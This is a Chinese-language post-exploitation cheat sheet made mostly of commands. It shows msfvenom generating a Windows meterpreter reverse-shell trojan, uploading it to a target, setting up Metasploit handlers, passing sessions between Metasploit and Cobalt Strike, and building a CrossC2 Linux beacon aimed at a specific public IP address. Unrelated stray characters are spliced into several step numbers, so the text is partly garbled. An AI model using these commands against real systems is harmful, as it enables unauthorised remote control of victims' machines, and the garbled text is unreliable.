1、MSF生成木馬
https://www.cnblogs.com/bmjoker/p/10051014.html
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
linux木馬工具 https://github.com/gloxec/CrossC2/blob/cs4.1/README_zh_full.md
將木馬上傳至靶機
2椰苟、msf控制木馬
啟用msf:msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1234
run
3抑月、靶機端木馬執(zhí)行
4树叽、msf控制端獲取靶機信息
5舆蝴、CS端配置新的監(jiān)聽
注意payload是http協(xié)議
6、msf控制端啟用bg
background
啟用payload_inject模塊
use exploit/windows/local/payload_inject
7题诵、msf端配置設置payload
set payload windows/meterpreter/reverse_http
8洁仗、msf端配置設置IP和端口
set lhost 192.168.1.5
set lport 6666
8、將session 1 轉(zhuǎn)給cs端
8性锭、CS端看到靶機信息
9赠潦、CS->MSF
MSF監(jiān)聽:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 3344
run
CS:spawn 監(jiān)聽器
監(jiān)聽器:windows/foreign/reverse_http msf_IP msf_端口
10、冰蝎->MSF->CS
https://github.com/rebeyond/Behinder/releases/
#后滲透CS-CrossC2上線Linux主機
https://github.com/gloxec/CrossC2/
1.自己生成:
./genCrossC2.Linux 47.242.218.253 6666 null null Linux x64 test
2.配置插件生成:https://www.cnblogs.com/xuanlvsec/p/14240479.html